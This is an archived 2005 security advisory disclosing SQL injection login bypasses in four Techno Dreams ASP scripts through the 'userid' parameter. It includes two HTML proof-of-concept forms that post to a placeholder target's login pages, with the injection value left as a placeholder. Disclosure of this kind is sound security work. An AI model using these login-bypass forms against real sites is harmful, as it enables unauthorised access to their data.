what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

advisory-103.txt

advisory-103.txt
Posted Oct 27, 2005
Authored by Farhad Koosha | Site kapda.ir

Various Techno Dreams scripts are susceptible to sql injection flaws. Proof of concept examples provided.

tags | exploit, sql injection, proof of concept
SHA-256 | 366fb83d32315f71627422a527b6480b8afc654f0ebe44f9173576308a730e15

advisory-103.txt

Change Mirror Download
[KAPDA::#9]Techno Dreams Scripts Vulnerabilities

KAPDA New advisory

Vulnerable products :

Techno Dreams Announcement Script
Techno Dreams Guestbook Script
Techno Dreams Mailing List Script
Techno Dreams WebDirectory Script

Vendor: https://www.t-dreams.com/

Risk: High

Vulnerability: Sql injection

Date :
--------------------
2005/10/22

About Techno Dreams Scripts
--------------------
Techno Dreams Announcement Script

If you have a site and want to make a section for Announcements or

Recent News, then you might need this script.

Techno Dreams Guestbook Script

It uses MS Access with ability to be upgraded into SQL. Now, we've

added an Admin Area for the script.

Techno Dreams Mailing List Script :

Let your visitors join your mailing list... and send mass emails to all

of this list. Very good but simple ASP script (MS Access but SQL

upgradeable).


Techno Dreams WebDirectory :

Simple yet effect search engine (if we could say about it; since it's

look like a web directory). With some advance features like approval,

hits, categories, advance search, admin area, what's new, new updated,

and what's hot...

Vendor`s description : https://www.t-dreams.com/downloads.asp

Discussion :
----------------
Several scripts do not properly validate user-supplied input. A remote

user can create specially crafted parameter values that will execute

SQL commands on the underlying database.

Vulnerabilities:
--------------------
Sql injection in /admin/login.asp (Announcement - Guestbook -

WebDirectory)

Sql injection in /login.asp ( Mailing List)

at parameter named 'userid'. Attacker can enter SQL command to

login as low-level user.(For all products)

Proof of Concepts:
--------------------

<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="https://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="https://[target]/admin/login.asp">
<input type="hidden" name="userid" value="[SQL Injection]">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="https://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="https://[target]/login.asp">
<input type="hidden" name="userid" value="[SQL Injection}">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

Solution:
--------------------
No patch`s released yet by vendor.

More Detail:
--------------------
https://www.kapda.ir/advisory-103.html
Visit Above Link for more details.


Credit :
--------------------
Farhad Koosha of KAPDA
farhadkey [at} kapda.ir
Kapda - Security Science Researchers Insitute of Iran
https://www.KAPDA.ir
(PersianHacker.NET)
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close